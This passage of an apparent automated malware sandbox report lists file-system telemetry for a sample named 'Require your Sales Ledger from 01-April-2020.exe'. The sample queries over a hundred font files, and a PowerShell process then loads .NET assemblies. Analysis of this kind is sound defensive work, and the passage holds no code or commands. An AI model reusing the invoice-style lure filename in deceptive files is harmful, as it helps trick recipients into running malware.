Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
